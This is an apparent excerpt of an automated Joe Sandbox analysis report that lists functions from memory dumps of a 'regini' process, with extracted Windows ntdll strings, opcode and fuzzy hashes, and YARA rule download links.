                                                                              • Opcode ID: 4be3d6395045b88e7c4927ed1e28bb1d0c9170ec24e8a1d8d9331725f7d082e8
                                                                              • Instruction ID: c1f222ae55b2607017d4f3aea840c66a41384d9395c480a0481d051ceac78c6c
                                                                              • Opcode Fuzzy Hash: 4be3d6395045b88e7c4927ed1e28bb1d0c9170ec24e8a1d8d9331725f7d082e8
                                                                              • Instruction Fuzzy Hash: A1510975A00645AFDF70DF5CC8A097FB7F9EB44200B4488E9EA96C7642D7B4EA44CB60
                                                                              Function 02E63BD1 Relevance: 15.0, Strings: 12, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3756702610.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2e60000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %218$%8>3$/xfn$24<8$;;6x$bygw$effe$lw%!$mfny$wcye$xegf$yg
                                                                              • API String ID: 0-3778452520
                                                                              • Opcode ID: b8098ad5589fbc7e239b4a2717ba39d0daa2bfdd868c68bf2637d3505216b232
                                                                              • Instruction ID: f19a654f74f0982b21fed52b06e91d9da8822fb105015c0f876a4d4156601a57
                                                                              • Opcode Fuzzy Hash: b8098ad5589fbc7e239b4a2717ba39d0daa2bfdd868c68bf2637d3505216b232
                                                                              • Instruction Fuzzy Hash: 4A112570C54A4CDADB049F98E986AEDBB70FB05304FA49198D015AB296C7750A42CF86
                                                                              Function 02B77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • ExecuteOptions, xrefs: 02BB46A0
                                                                              • Execute=1, xrefs: 02BB4713
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 02BB4787
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02BB4655
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02BB46FC
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02BB4742
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02BB4725
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: 02048a763a309acbbdf7c022cce449f051a22b8ba106615746f46f8a41c5a412
                                                                              • Instruction ID: e1eda3d8c652daaeaa60cea9fd9f7a6b1a809fd5b2a8b6fb299033b9ec98684f
                                                                              • Opcode Fuzzy Hash: 02048a763a309acbbdf7c022cce449f051a22b8ba106615746f46f8a41c5a412
                                                                              • Instruction Fuzzy Hash: 2B510831A002197BEF11AAA8DC99FF9B3B9EF04304F1404E9E519AB191EF71EA45DF50
                                                                              Function 02B8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction ID: ac67ed4b4784353e8dc10e34f779ef774e5faccebbf688385c49a2d18efd74ad
                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction Fuzzy Hash: 8E81B074E052499FDF24AE78C8917FEBBB2EF4531CF18429AD869E7291C734A840CB54
                                                                              Function 02BF20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$[$]:%u
                                                                              • API String ID: 48624451-2819853543
                                                                              • Opcode ID: 95f1b9575c7e1604c1a25730fdf84d0cf0a4097653237cdf399f091050213d96
                                                                              • Instruction ID: 74c7d4624ef7ab1d8b626f41ceef4a58c4b753c98c91245bbf11cb4a35f25641
                                                                              • Opcode Fuzzy Hash: 95f1b9575c7e1604c1a25730fdf84d0cf0a4097653237cdf399f091050213d96
                                                                              • Instruction Fuzzy Hash: 10215E76A00119ABDB50EE69C841AEFBBF9EF44744F4401A6EE05E3200EB30DA558BA5
                                                                              Function 02B6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 02BB031E
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02BB02E7
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02BB02BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              • Opcode ID: 02843d35d8cbd5d615d865f846f57e336577fdd69f29e5be6492f84884dbf271
                                                                              • Instruction ID: 5816b6315d148b5f070a016bdc3ae74ee2c8c20eb65598171214280f9c20fa5b
                                                                              • Opcode Fuzzy Hash: 02843d35d8cbd5d615d865f846f57e336577fdd69f29e5be6492f84884dbf271
                                                                              • Instruction Fuzzy Hash: 12E1AC306087419FD725DF28D888B7AB7E1FF88314F144AA9F5A68B6E0D778D844CB42
                                                                              Function 02B7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RTL: Resource at %p, xrefs: 02BB7B8E
                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02BB7B7F
                                                                              • RTL: Re-Waiting, xrefs: 02BB7BAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 0-871070163
                                                                              • Opcode ID: 008af1dc9548cf34d9e75157db35e48a1e3d1faa8c4d65708b4980da00a4c901
                                                                              • Instruction ID: e2ba3d478d8303eae4e6ef77674a95815ad78f34e2579bdf0823a97e003db715
                                                                              • Opcode Fuzzy Hash: 008af1dc9548cf34d9e75157db35e48a1e3d1faa8c4d65708b4980da00a4c901
                                                                              • Instruction Fuzzy Hash: E54107313047029FD721DE25C850B6AB7E6EF88714F100A9DF9AADB680DB71E505CF91
                                                                              Function 02B7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02BB728C
                                                                              Strings
                                                                              • RTL: Resource at %p, xrefs: 02BB72A3
                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02BB7294
                                                                              • RTL: Re-Waiting, xrefs: 02BB72C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 885266447-605551621
                                                                              • Opcode ID: 20feed97cb0fd645253d3b6659bee2ac5261e3a0008d4f83c2a93c7ebad686ea
                                                                              • Instruction ID: cbc29695d48106dfdee5c4acba9af78f5a7f63c5c7c066535b0c4e4b2b4b9164
                                                                              • Opcode Fuzzy Hash: 20feed97cb0fd645253d3b6659bee2ac5261e3a0008d4f83c2a93c7ebad686ea
                                                                              • Instruction Fuzzy Hash: B441F432A00206AFDB11DE24CC41BA6B7A5FF95714F1406A9F9A5EB240DB71E846DBD0
                                                                              Function 02BF2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$]:%u
                                                                              • API String ID: 48624451-3050659472
                                                                              • Opcode ID: bcb6c455056ca0b7f599d4e7e77feef353ba8b3e2f2b58369a209559688e15fa
                                                                              • Instruction ID: f5020b8ab571942442f3e9c05516c42278521fca87988711b8997e10b33ebfba
                                                                              • Opcode Fuzzy Hash: bcb6c455056ca0b7f599d4e7e77feef353ba8b3e2f2b58369a209559688e15fa
                                                                              • Instruction Fuzzy Hash: 1D316472A006199FDB60DE29CC51BEEB7F9EB44714F4445D6ED49E3240EB30EA488FA0
                                                                              Function 02B87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction ID: fd52191c5b564b3dd3a145534bfc3e86c3bc7289a94bef31ba2791cc9e161ac1
                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction Fuzzy Hash: F491B779E0025A9BDB24FE59C8806BEF7A5EF44328F74459AE85DEB2C0DF309940DB50
                                                                              Function 02B49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280
                                                                              • Opcode ID: fba1861a7ca0504ee2934272dac586a943153884c3aedfe1d517bd1712dc9974
                                                                              • Instruction ID: 9dbc91c40104dc34502e4addcb920070b26696c8e143731759335a7872403d3b
                                                                              • Opcode Fuzzy Hash: fba1861a7ca0504ee2934272dac586a943153884c3aedfe1d517bd1712dc9974
                                                                              • Instruction Fuzzy Hash: 06812A72D006699BDB21DF54CC54BEEB7B8AF08714F0046EAEA09B7240D7709E84DFA0
                                                                              Function 02BCCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 02BCCFBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: CallFilterFunc@8
                                                                              • String ID: @$@4rw@4rw
                                                                              • API String ID: 4062629308-2979693914
                                                                              • Opcode ID: 43b99494afa693f91b9efcae0f2f54e23bf733103529c7fa6058f0ad0266e619
                                                                              • Instruction ID: bc41a45fbfc399e7e36d57af44bdce4ff319d15e8c73d69ef6dbfc085e52f989
                                                                              • Opcode Fuzzy Hash: 43b99494afa693f91b9efcae0f2f54e23bf733103529c7fa6058f0ad0266e619
                                                                              • Instruction Fuzzy Hash: 0E41BD75900265DFDB21EFA9C840AAEBBB9EF45B14F2045BEE905DB250E734C801CBA4